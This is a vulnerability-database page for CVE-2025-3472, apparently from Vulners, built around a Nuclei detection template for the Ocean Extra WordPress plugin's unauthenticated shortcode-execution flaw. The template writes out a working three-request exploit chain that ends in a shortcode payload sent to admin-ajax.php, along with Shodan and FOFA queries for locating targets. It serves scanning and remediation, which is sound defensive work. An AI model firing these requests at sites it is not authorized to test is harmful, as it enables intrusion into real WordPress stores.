| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-3472 | 22 Apr 202512:03 | – | circl | |
| WordPress plugin Ocean Extra 代码注入漏洞 | 22 Apr 202500:00 | – | cnnvd | |
| CVE-2025-3472 | 22 Apr 202511:12 | – | cve | |
| CVE-2025-3472 Ocean Extra <= 2.4.6 - Unauthenticated Arbitrary Shortcode Execution | 22 Apr 202511:12 | – | cvelist | |
| EUVD-2025-12293 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-3472 | 22 Apr 202512:15 | – | nvd | |
| CVE-2025-3472 | 22 Apr 202512:15 | – | osv | |
| WordPress Ocean Extra plugin <= 2.4.6 - Unauthenticated Arbitrary Shortcode Execution vulnerability | 22 Apr 202502:05 | – | patchstack | |
| PT-2025-17522 | 22 Apr 202500:00 | – | ptsecurity | |
| CVE-2025-3472 | 26 Apr 202500:47 | – | redhatcve |
id: CVE-2025-3472
info:
name: Ocean Extra <= 2.4.6 - Unauthenticated Shortcode Execution
author: theamanrawat
severity: medium
description: |
The Ocean Extra plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.4.6. This is due to the software allowing users to supply arbitrary shortcodes in the content_rech_data parameter that is then executed. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes when WooCommerce is also installed and activated.
impact: |
Unauthenticated attackers can execute arbitrary WordPress shortcodes, potentially leading to information disclosure, privilege escalation, or further site compromise depending on available shortcodes.
remediation: Update Ocean Extra plugin to version 2.4.7 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/74428e76-1946-408f-8adc-24ab4b7e46c5
- https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/shortcodes/shortcodes.php#L618
- https://plugins.trac.wordpress.org/changeset/3277977/
- https://nvd.nist.gov/vuln/detail/CVE-2025-3472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-3472
cwe-id: CWE-94
epss-score: 0.01717
epss-percentile: 0.74673
metadata:
verified: true
max-request: 3
vendor: oceanwp
product: ocean_extra
framework: wordpress
fofa-query: body="oceanwp" && body="woocommerce"
shodan-query: http.html:"oceanwp" http.html:"woocommerce"
tags: cve,cve2025,wordpress,wp-plugin,ocean-extra,oceanwp,woocommerce,shortcode,unauth,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /?s=&post_type=product HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- 'contains(body, "add-to-cart=")'
internal: true
extractors:
- type: regex
name: product_id
part: body
group: 1
regex:
- '(?:add-to-cart=|data-product_id="|product-)(\d+)'
internal: true
- raw:
- |
GET /?add-to-cart={{product_id}}&quantity=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 302'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=update_oceanwp_woo_free_shipping_left_shortcode&content_rech_data=[woocommerce_my_account]&content=test
matchers:
- type: dsl
dsl:
- 'contains_all(body, "oceanwp-woo-free-shipping", "username", "password")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 490a00463044022067a53f4a0286caf023191890dfd7f9d18058f8fd393682a724c3b3a44641cc960220350acf164d1df70b4ed7e4ffe14537686ef44e934364dd98ab793f325a33805f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation